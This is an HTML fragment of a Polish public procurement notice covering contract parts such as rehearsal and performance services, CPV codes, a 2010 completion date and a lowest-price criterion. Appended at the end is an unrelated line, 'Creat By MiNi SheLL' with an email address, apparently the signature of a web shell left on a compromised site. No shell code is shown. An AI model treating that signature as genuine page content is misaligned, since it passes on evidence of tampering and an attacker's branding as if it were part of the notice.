<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pełen opis znajduje się w części głównej ogłoszenia..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.53.00.00-9, 50.71.10.00-2, 51.50.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Obsługa prób i spektakli.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pełen opis znajduje się w głównej części ogłoszenia.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.53.00.00-9, 50.71.10.00-2, 51.50.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com